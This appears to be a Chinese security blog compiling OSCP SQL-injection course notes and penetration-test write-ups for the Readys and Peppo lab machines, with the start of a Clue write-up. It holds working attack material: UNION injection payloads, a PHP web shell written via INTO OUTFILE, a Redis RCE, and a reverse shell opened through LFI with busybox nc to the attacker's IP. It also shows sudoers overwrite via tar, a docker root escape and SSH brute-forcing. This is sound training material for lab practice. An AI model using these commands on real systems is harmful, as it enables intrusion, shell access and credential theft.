这应该输出大量数据，其中大部分引用有关 MariaDB 中默认对象的信息。它还将包括表名，但我们需要滚动浏览输出以找到它们。

users 表看起来特别有趣。让我们针对该表并使用以下查询检索列名：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, column_name from information_schema.columns where table_name='users'

这会输出 users 表的所有列名：

我们知道原始查询选择三列，网页显示第二列和第三列。如果我们更新 union payload，我们可以在第二列中显示用户名，在第三列中显示密码。

http://10.11.0.22/debug.php?id=1 union all select 1, username, password from users

这将在 name 字段中输出数据库用户名，在 comments 字段中输出密码：

太好了。我们不仅获得了用户名和密码，而且密码都是明文的。我们可以通过登录管理页面来验证这些信息。

我们可以查看源代码来验证我们通过黑盒测试推断出的内容：

 136 <?php
 237 include "database.php";
 338 if (isset($_GET['id'])) {
 439 $sql = "SELECT id, name, text FROM feedback WHERE id=". $_GET['id'];
 540 $result = $conn->query($sql);
 641 if (!$result) {
 742 trigger_error('An error occured: ' . $conn->error);
 843 } else if ($result->num_rows > 0) {
 944 while($row = $result->fetch_assoc()) {
1045 echo "<tr><td> " . $row["name"]. "</td><td>" . $row["text"]. "</td></tr>";
1146 }
1247 } else { echo "No results. Specify an id."; }
1348 } else {
1449 echo "No results. Specify an id in your URL like ?id=1.";
1550 }
1651 ?>

导致 SQL 注入的易受攻击代码在列表 332 的第 39 行。注入点位于查询末尾的"WHERE"子句中，这使得使用"UNION" payload 变得容易。查询的结果被获取，然后在第 45 行写出以供显示。请注意，虽然查询中包含三列，但只显示其中两列。这就是为什么我们使用第二列和第三列从另一个表中提取数据。

练习

使用 SQL 注入枚举数据库的结构。
理解如何以及为什么可以从注入的命令中提取数据并将其显示在屏幕上。
从数据库中提取所有用户和相关密码。

从 SQL 注入到代码执行

让我们看看能将这个漏洞推进到什么程度。根据操作系统、服务权限和文件系统权限，SQL 注入漏洞可用于读取和写入底层操作系统上的文件。将包含 PHP 代码的精心制作的文件写入 Web 服务器的根目录，然后可以利用它来实现完整的代码执行。

首先，让我们看看是否可以使用 load_file 函数读取文件：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')

这应该输出 hosts 文件的内容：

接下来，我们将尝试使用 INTO OUTFILE 函数在服务器的 Web 根目录中创建恶意 PHP 文件。根据我们已经看到的错误消息，我们应该知道 Web 根目录的位置。我们将尝试编写一个简单的 PHP 一行代码，类似于 LFI 示例中使用的代码：

http://10.11.0.22/debug.php?id=1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>" into OUTFILE 'c:/xampp/htdocs/backdoor.php'

如果成功，该文件应该放在 Web 根目录中：

此命令产生错误消息，但这并不一定意味着文件创建不成功。让我们尝试使用 cmd 参数（如 ipconfig）访问新创建的 backdoor.php 页面。

练习

利用 SQL 注入以及 MariaDB INTO OUTFILE 函数获取代码执行。
将简单的代码执行转变为完整的 shell。

自动化 SQL 注入

我们遵循的 SQL 注入过程可以借助 Kali Linux 中预安装的几个工具实现自动化。其中一个更值得注意的工具是 sqlmap，它可用于识别和利用针对各种数据库引擎的 SQL 注入漏洞。

让我们在示例 Web 应用程序上使用 sqlmap。我们将使用 -u 设置要扫描的 URL，并使用 -p 指定要测试的参数：

1kali@kali:~$ sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id"

Sqlmap 将发出多个请求来探测参数是否易受 SQL 注入攻击。它还尝试确定正在使用的数据库软件，以便可以针对该软件调整攻击。在这种情况下，它发现了四种不同的技术来利用漏洞。它还列出了每种技术的 payload。即使 sqlmap 为我们完成工作，拥有这些示例 payload 也有助于我们理解它是如何利用漏洞的。

我们现在可以使用 sqlmap 自动从数据库中提取数据。我们将再次运行 sqlmap，使用 –dbms 将"MySQL"设置为后端类型，并使用 –dump 转储数据库中所有表的内容。Sqlmap 在 –dbms 标志中支持多个后端数据库，但它不区分 MariaDB 和 MySQL。将"MySQL"设置为足以满足此示例。

1kali@kali:~$ sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id" --dbms=mysql --dump

除了在终端窗口中显示内容外，sqlmap 还创建了一个包含转储内容的 CSV 文件。

Sqlmap 有许多其他功能，例如尝试绕过 Web 应用程序防火墙（WAF）的能力，以及执行复杂查询以自动完全接管服务器的能力。例如，使用 os-shell 参数将尝试在目标系统上自动上传和执行远程命令 shell。

我们可以通过使用 –os-shell 运行 sqlmap 在系统上执行 shell 来使用此功能：

1kali@kali:~$ sqlmap -u http://10.11.0.22/debug.php?id=1 -p "id" --dbms=mysql --os-shell

一旦 sqlmap 建立了 shell，我们就可以在服务器上运行命令并查看输出，如列表 337 所示。这个 shell 可能有点慢，但它可以提供一个有效的立足点来访问底层服务器。

重要提示： 请注意，OSCP 考试中不允许使用 sqlmap。但是，我们建议在实验室和 Windows 10 实验室机器上进行练习。考虑将其与 Burp 和 Wireshark 等工具结合使用，以捕获工具正在执行的操作，然后尝试手动复制攻击。这通常是一种非常有效的学习技术，不应被忽视。

练习

使用 sqlmap 获取数据库的完整转储。
使用 sqlmap 获取交互式 shell。

第九章总结

第九章内容提到了很多常见的web漏洞，但是教材上能提到的利用方法只简单描述了原理，没有考虑真实复杂环境下的WAF过滤，系统版本等问题。部分命令已无法再直接利用，推荐自行做专题的练习。

[[upload-Labs 靶场 WP]] [[sqli-labs 靶场合集 WP]] [[DVWA 靶场 WP|DVWA]] [[xss-labs 靶场 WP]]

在线靶场-综合漏洞练习靶场

更推荐用Docker镜像在本地练习更方便查看靶场内部设置，这样你可以直接查看你的上传的木马，注入的语句，在靶机里都是如何运作的，可以直接求证。一键拖取全部镜像命令：

1docker run -d --name upload-labs -p 8883:80 c0ny1/upload-labs
2docker run -d --name xss-labs -p 8884:80 vulfocus/xss-labs
3docker run -d --name sqli-labs -p 8887:80 acgpiano/sqli-labs
4docker run -d --name dvwa -p 8888:80 vulnerables/web-dvwa

OSCP第十章之后的内容，本博客和公众号不再发布笔记，感兴趣的可以自行报名OSCP学习，或加入泷羽学习群分享交流。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Readys WP

Wed, 15 Oct 2025 16:58:28 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.182
3# 靶机地址
4192.168.147.166

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.147.166 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.166
 9sudo nmap --script=vuln -p$ports -Pn 192.168.147.166
10# 扫描目录
11gobuster dir -e -u http://192.168.147.166 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
12whatweb http://192.168.147.166/
13wpscan --update --url http://192.168.147.166/ --enumerate ap,t,u --api-token XXX

扫描结果如下：

 1┌──(kali㉿kali)-[~/Desktop/Readys]
 2└─$ echo $ports
 322,80,6379
 4
 5┌──(kali㉿kali)-[~/Desktop/Readys]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.166
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 05:12 EDT
 8Nmap scan report for 192.168.147.166
 9Host is up (0.12s latency).
10
11PORT STATE SERVICE VERSION
1222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
13| ssh-hostkey:
14| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
15| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
16|_ 256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
1780/tcp open http Apache httpd 2.4.38 ((Debian))
18|_http-title: Readys &#8211; Just another WordPress site
19|_http-generator: WordPress 5.7.2
20|_http-server-header: Apache/2.4.38 (Debian)
216379/tcp open redis Redis key-value store
22Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
23Device type: general purpose|router
24Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
25OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
26OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
27Network Distance: 4 hops
28Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
29
30OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
31Nmap done: 1 IP address (1 host up) scanned in 42.97 seconds
32
33┌──(kali㉿kali)-[~/Desktop/Readys]
34└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.147.166
35Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 05:18 EDT
36Nmap scan report for 192.168.147.166
37Host is up (0.12s latency).
38
39PORT STATE SERVICE
4022/tcp open ssh
4180/tcp open http
42| http-csrf:
43| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.147.166
44| Found the following possible CSRF vulnerabilities:
45|
46| Path: http://192.168.147.166:80/
47| Form id: search-form-1
48| Form action: http://192.168.147.166/
49|
50| Path: http://192.168.147.166:80/index.php/category/uncategorised/
51| Form id: search-form-1
52| Form action: http://192.168.147.166/
53|
54| Path: http://192.168.147.166:80/index.php/comments/feed/1quot;https:/gravatar.com&quot;&gt;Gravatar&lt;/a&gt;.]]
55| Form id: search-form-2
56| Form action: http://192.168.147.166/
57|
58| Path: http://192.168.147.166:80/index.php/comments/feed/1quot;https:/gravatar.com&quot;&gt;Gravatar&lt;/a&gt;.]]
59| Form id: search-form-1
60|_ Form action: http://192.168.147.166/
61|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
62|_http-sql-injection: ERROR: Script execution failed (use -d to debug)
63| http-fileupload-exploiter:
64|
65| Couldn't find a file-type field.
66|
67|_ Couldn't find a file-type field.
68|_http-dombased-xss: Couldn't find any DOM based XSS.
69| http-wordpress-users:
70| Username found: admin
71|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
72| http-enum:
73| /wp-login.php: Possible admin folder
74| /readme.html: Wordpress version: 2
75| /: WordPress version: 5.7.2
76| /wp-includes/images/rss.png: Wordpress version 2.2 found.
77| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
78| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
79| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
80| /wp-login.php: Wordpress login page.
81| /wp-admin/upgrade.php: Wordpress login page.
82|_ /readme.html: Interesting, a readme.
836379/tcp open redis
84
85Nmap done: 1 IP address (1 host up) scanned in 118.67 seconds
86
87
88┌──(kali㉿kali)-[~/Desktop/Readys]
89└─$ whatweb http://192.168.147.166/
90http://192.168.147.166/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.147.166], JQuery[3.5.1], MetaGenerator[WordPress 5.7.2], PoweredBy[--], Script[text/javascript], Title[Readys &#8211; Just another WordPress site], UncommonHeaders[link], WordPress[5.7.2]
91
92===============================================================
93Starting gobuster in directory enumeration mode
94===============================================================
95/wp-contentwp-content (Status: 301) [Size: 323] [--> http://192.168.147.166/wp-content/]
96/wp-includeswp-includes (Status: 301) [Size: 324] [--> http://192.168.147.166/wp-includes/]
97/wp-adminwp-admin (Status: 301) [Size: 321] [--> http://192.168.147.166/wp-admin/]

发现存在用户名admin，但是密码爆不出来。

site-editor插件漏洞

1 | [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI)
2 | References:
3 | - https://wpscan.com/vulnerability/4432ecea-2b01-4d5c-9557-352042a57e44
4 | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7422
5 | - https://seclists.org/fulldisclosure/2018/Mar/40
6 | - https://github.com/SiteEditor/editor/issues/2

利用成功，发现有一个叫alice的用户，按照靶机的设置习惯，alice用户下面应该有一个flag，flag的文件名一般是local.txt，而root下面还有一个叫proof.txt的文件想直接看ssh密钥的，复制下来直接登录，但是ssh密钥看不了，只能看一下redis的配置

1/root/.ssh/id_rsa
2/home/alice/.ssh/id_rsa
3/etc/redis/redis.conf
4cat 166redis.conf |grep "requirepass"

得到redis的认证密码是Ready4Redis

1 redis-cli -h 192.168.147.166 -a 'Ready4Redis?'
2 info server

Redis-RCE 漏洞反弹shell

1git clone https://hk.gh-proxy.com/https://github.com/n0b0dyCN/redis-rogue-server.git
2git clone https://hk.gh-proxy.com/https://github.com/Ridter/redis-rce.git
3cd redis-rce
4cp ../redis-rogue-server/exp.so .
5# 新开一个终端等待反弹
6rlwrap -cAr nc -nlvp 80
7# 执行RCE脚本
8python redis-rce.py -r 192.168.147.166 -L 192.168.45.182 -P 6379 -f exp.so -a 'Ready4Redis?'
9python3 -c 'import pty;pty.spawn("/bin/bash")'

找到数据库配置

💡 数据库密码

karl Wordpress1234

文件权限php一句话木马

但是目前的redis账户还是不能直接登录，要找一个正经的用户。查找可以写的目录，然后把php一句话木马写上去。在各个⽬录尝试写⼊ echo "<?php phpinfo() ?>" > test.php ，/run/redis⽬录写⼊之后在使⽤LFI之后php会被解析，尝试写⼊⼀个⼀句话⽊⻢ echo '<?php system($_GET["cmd"]); ?>' > test.php

1find / -type d -maxdepth 5 -writable 2>/dev/null

1# kali 新建一个监听终端
2rlwrap -cAr nc -nlvp 443
3# 访问LFI地址
4http://192.168.147.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/run/redis/test.php&cmd=busybox%20nc%20192.168.45.182%20443%20-e%20sh
5busybox nc 192.168.45.182 443 -e sh
6# 美化终端
7python3 -c 'import pty;pty.spawn("/bin/bash")'

连上数据库得到WP的管理员密码，但是这个密码对我们之后的提权没有用了已经。

admin | $P$Ba5uoSB5xsqZ5GFIbBnOkXA0ahSJnb0

上传小豌豆查一下提权的点

查看/usr/local/bin/backup.sh文件的内容，发现可以用tar提权。详见[[OSCP官方靶场-Amaterasu WP#Tar提权详解]]-CNSD

tar提权

 1cd /var/www/html
 2echo "" > '--checkpoint=1' 
 3echo "" > '--checkpoint-action=exec=sh payload.sh' 
 4
 5# kali
 6echo "echo 'alice ALL=(root) NOPASSWD: ALL' > /etc/sudoers" >payload.sh
 7chmod +x payload.sh
 8python3 -m http.server
 9
10# 靶机
11wget 192.168.45.182:8080/payload.sh
12sudo -l 
13sudo /bin/bash

提权成功，拿到flag。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.182]
 B[靶机 
 192.168.147.166]
 C[WP插件site-editor 文件读取漏洞]
 D[Redis-RCE漏洞]
 E[文件读取漏洞综合利用提升为Alice]
 F[Tar提权root]
 

 %% 路径关系
 A-->|扫描|B
 B-->C
 C-->D
 D-->E
 E-->F

	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B,C,D public;
 class E,F internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-10-15 17:05, 2025-10-15 17:51
 漏洞识别 :a2, after a1, 15m
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-10-15 19:05
 权限提升 :crit,b2, after b1, 35m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Peppo WP

Wed, 15 Oct 2025 15:08:22 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.182
3# 靶机地址
4192.168.147.60

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.147.60 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.60
 9sudo nmap --script=vuln -p$ports -Pn 192.168.147.60
10# 扫描目录
11sudo gobuster dir -u http://192.168.147.60:8080 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 25
12 sudo gobuster dir -u http://192.168.147.60:10000 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 25 --exclude-length 12
13whatweb http://192.168.147.60:8080/

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ echo $ports
 322,53,113,5432,8080
 4
 5┌──(kali㉿kali)-[~]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.60
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:13 EDT
 8Nmap scan report for 192.168.147.60
 9Host is up (0.12s latency).
 10
 11PORT STATE SERVICE VERSION
 1222/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
 13|_auth-owners: root
 14| ssh-hostkey:
 15| 2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
 16| 256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
 17|_ 256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
 1853/tcp closed domain
 19113/tcp open ident FreeBSD identd
 20|_auth-owners: nobody
 215432/tcp open postgresql PostgreSQL DB 9.6.0 or later
 228080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
 23|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
 24| http-robots.txt: 4 disallowed entries
 25|_/issues/gantt /issues/calendar /activity /search
 26|_http-title: Redmine
 27Aggressive OS guesses: Linux 3.10 - 4.11 (96%), Linux 3.13 - 4.4 (96%), Linux 3.2 - 4.14 (94%), Linux 2.6.32 - 3.13 (93%), Linux 3.8 - 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.13 or 4.2 (90%), Linux 4.4 (90%), Linux 2.6.32 - 3.10 (90%), Linux 5.0 - 5.14 (90%)
 28No exact OS matches for host (test conditions non-ideal).
 29Service Info: OSs: Linux, FreeBSD; CPE: cpe:/o:linux:linux_kernel, cpe:/o:freebsd:freebsd
 30
 31OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 32Nmap done: 1 IP address (1 host up) scanned in 32.27 seconds
 33
 34┌──(kali㉿kali)-[~]
 35└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.147.60
 36Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:27 EDT
 37Nmap scan report for 192.168.147.60
 38Host is up (0.12s latency).
 39
 40PORT STATE SERVICE
 4122/tcp open ssh
 4253/tcp closed domain
 43113/tcp open ident
 445432/tcp open postgresql
 458080/tcp open http-proxy
 46| http-slowloris-check:
 47| VULNERABLE:
 48| Slowloris DOS attack
 49| State: LIKELY VULNERABLE
 50| IDs: CVE:CVE-2007-6750
 51| Slowloris tries to keep many connections to the target web server open and hold
 52| them open as long as possible. It accomplishes this by opening connections to
 53| the target web server and sending a partial request. By doing so, it starves
 54| the http server''s resources causing Denial Of Service.
 55|
 56| Disclosure date: 2009-09-17
 57| References:
 58| http://ha.ckers.org/slowloris/
 59|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
 60| http-enum:
 61| /login.stm: Belkin G Wireless Router
 62| /admin.php: Possible admin folder (401 Unauthorized )
 63| /login.php: Possible admin folder
 64| /login.html: Possible admin folder
 65| /admin.cfm: Possible admin folder (401 Unauthorized )
 66| /login.cfm: Possible admin folder
 67| /admin.asp: Possible admin folder (401 Unauthorized )
 68| /login.asp: Possible admin folder
 69| /admin.aspx: Possible admin folder (401 Unauthorized )
 70| /login.aspx: Possible admin folder
 71| /admin.jsp: Possible admin folder (401 Unauthorized )
 72| /login.jsp: Possible admin folder
 73| /users.sql: Possible database backup (401 Unauthorized )
 74| /login/: Login page
 75| /login.htm: Login page
 76| /login.jsp: Login page
 77| /robots.txt: Robots file
 78| /admin.nsf: Lotus Domino (401 Unauthorized )
 79| /news/: Potentially interesting folder
 80|_ /search/: Potentially interesting folder
 81
 82Nmap done: 1 IP address (1 host up) scanned in 413.78 seconds
 83
 84┌──(kali㉿kali)-[~]
 85└─$ whatweb http://192.168.147.60:8080
 86http://192.168.147.60:8080 [200 OK] ChiliProject, Cookies[_redmine_session], Country[RESERVED][ZZ], HTML5, HTTPServer[WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)], HttpOnly[_redmine_session], IP[192.168.147.60], JQuery, Redmine, Ruby[2.6.6,WEBrick/1.4.2], Script, Title[Redmine], UncommonHeaders[x-content-type-options,x-download-options,x-permitted-cross-domain-policies,referrer-policy,x-request-id], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block]
 87
 88===============================================================
 89Starting gobuster in directory enumeration mode
 90===============================================================
 91/newsnews (Status: 200) [Size: 5361]
 92/searchsearch (Status: 200) [Size: 7933]
 93/loginlogin (Status: 200) [Size: 5011]
 94/projectsprojects (Status: 200) [Size: 12258]
 95/usersusers (Status: 302) [Size: 150] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fusers]
 96/adminadmin (Status: 302) [Size: 150] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fadmin]
 97/issuesissues (Status: 200) [Size: 19698]
 98/groupsgroups (Status: 302) [Size: 151] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fgroups]
 99/mymy (Status: 302) [Size: 147] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fmy]
100/logoutlogout (Status: 302) [Size: 93] [--> http://192.168.147.60:8080/]
101/404404 (Status: 200) [Size: 459]
102/settingssettings (Status: 302) [Size: 153] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fsettings]
103/activityactivity (Status: 200) [Size: 7312]
104/500500 (Status: 200) [Size: 648]
105Progress: 24077 / 220559 (10.92%)^C

没有发现什么

SSH密码爆破

1sudo apt install ident-user-enum
2ident-user-enum 192.168.147.60 22 113 8080 10000
3hydra -L users.txt -P users.txt ssh://192.168.147.60

Ident-user-enum 用这个软件来爆破各个端口可能存在的用户名，然后使⽤⽤⼾名=密码的形式试一下。得到ssh的登录名和密码

💡 ssh密码

eleanor

登录后发现终端受限，是只读终端，能执行的命令有限，所以做逃逸

rbash逃逸

参考 https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

1echo $PATH # 查看路径变量
2ed
3!/bin/bash
4export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

得到第一个flag

提权

查看etc/paawd的时候发现提示有一封邮件算是触发了一种管理员警告的邮件？我刚刚想要sudo -l 提权的时候发现没有权限。发现用户是在docker组中，docker提权一下

1docker images
2docker run -v /:/mnt --rm -it redmine chroot /mnt bash
3cat root/proof.txt

得到第二个flag。

总结

入侵路径示意图

flowchart TD
 %% 资产列表
 A[Kali攻击机 
 192.168.45.182]
 B[靶机 
 192.168.147.60]
 C[SSH 密码爆破]
 D[rbash 逃逸]
 E[Docker 逃逸]

 
 %% 路径关系
 A-->|扫描|B
 B-->C
 C-->D
 D-->E


	%% 线型：---（实线）、-.->（虚线）、==>（粗箭头）
	%% -->|是|：带条件文本的连接
	%% 矩形节点[ ]，菱形决策节点{ }，圆弧方节点()
 %% 样式定义
 classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
 classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px; 
 classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px; 
 %% 线型与颜色方案（亮色/暗色通用）
	linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0; 

 %% 应用样式
 class A attack;
 class B public;
 class C,D,E internal;

入侵时间表

gantt
 title 攻击时间表
 dateFormat YYYY-MM-DD HH:mm
 axisFormat %H:%M
 
 section 侦察阶段
 目标扫描 :a1, 2025-10-15 15:13, 2025-10-15 15:40
 漏洞识别 :a2, after a1, 15m
 
 section 攻击阶段
 初始访问 :b1, after a2, 2025-10-15 16:40
 权限提升 :crit,b2, after b1, 5m
 
 section 后渗透阶段
 数据窃取 :c1, after b2, 5m

补充知识点-Docker提权

这个命令让你获得 root 权限的原因在于 Docker 的特权操作和文件系统挂载的结合使用。以下是详细解释：

🔧 命令分解：

docker run -v /:/mnt --rm -it redmine chroot /mnt bash

docker run
- 启动一个新容器
-v /:/mnt
- 关键操作：将宿主机的整个根文件系统 (/) 挂载到容器的 /mnt目录
- 这意味着容器可以直接访问宿主机的所有文件
--rm
- 容器退出后自动删除
-it
- 分配交互式终端
redmine
- 使用的镜像（这里可以是任意镜像）
chroot /mnt bash
- 核心逃逸：在容器内执行 chroot命令
- 将根目录切换到宿主机的文件系统 (/mnt)
- 然后启动 bashshell

🚀 为什么能获得 root 权限：

Docker 组的特权
- 你的用户属于 docker组（groups=...999(docker)）
- Docker 组成员可以运行容器，默认以 root 身份执行容器内命令
文件系统挂载
- -v /:/mnt使容器能访问宿主机的完整文件系统
chroot 切换
- chroot /mnt将工作环境切换到宿主机的文件系统
- 此时你在容器内执行的命令，实际是在操作宿主机
权限继承
- 容器内的 root 用户映射到宿主机的 root 用户
- 当你在 chroot 环境中执行命令时，拥有宿主机的 root 权限

⚠️ 安全风险：

这种操作极其危险，因为：

完全绕过系统权限控制
可以任意修改系统文件
能访问所有用户数据
相当于直接获得宿主机 root 权限

🔒 系统管理员应该：

限制 docker 组权限：

sudo usermod -G eleanor -a # 从docker组移除用户

启用用户命名空间隔离：

# /etc/docker/daemon.json
{
 "userns-remap": "default"
}

限制危险挂载：

docker run --cap-drop=ALL --security-opt no-new-privileges ...

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

OSCP官方靶场 Clue WP

Fri, 22 Aug 2025 15:37:55 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

官网打开靶场

信息收集

1# Kali攻击机地址
2192.168.45.187
3# 靶机地址
4192.168.133.240

扫描端口和目录

 1# 设置MTU
 2sudo ip link set dev tun0 mtu 1250
 3ip link show tun0
 4# 扫描端口
 5ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.133.240 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
 6echo $ports
 7# 扫描服务
 8sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.133.240
 9sudo nmap --script=vuln -p$ports -Pn 192.168.133.240
10# 扫描框架
11whatweb http://192.168.133.240:3000/
12# 扫描目录
13gobuster dir -e -u http://192.168.133.240:3000 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e -t 25 --exclude-length 3837

直接扫目录会因为长度报错，修改了一下命令

扫描结果如下：

 1┌──(kali㉿kali)-[~]
 2└─$ echo $ports
 322,80,139,445,3000
 4
 5┌──(kali㉿kali)-[~]
 6└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.133.240
 7Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 03:47 EDT
 8Nmap scan report for 192.168.133.240
 9Host is up (0.20s latency).
10
11PORT STATE SERVICE VERSION
1222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
13| ssh-hostkey:
14| 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
15| 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
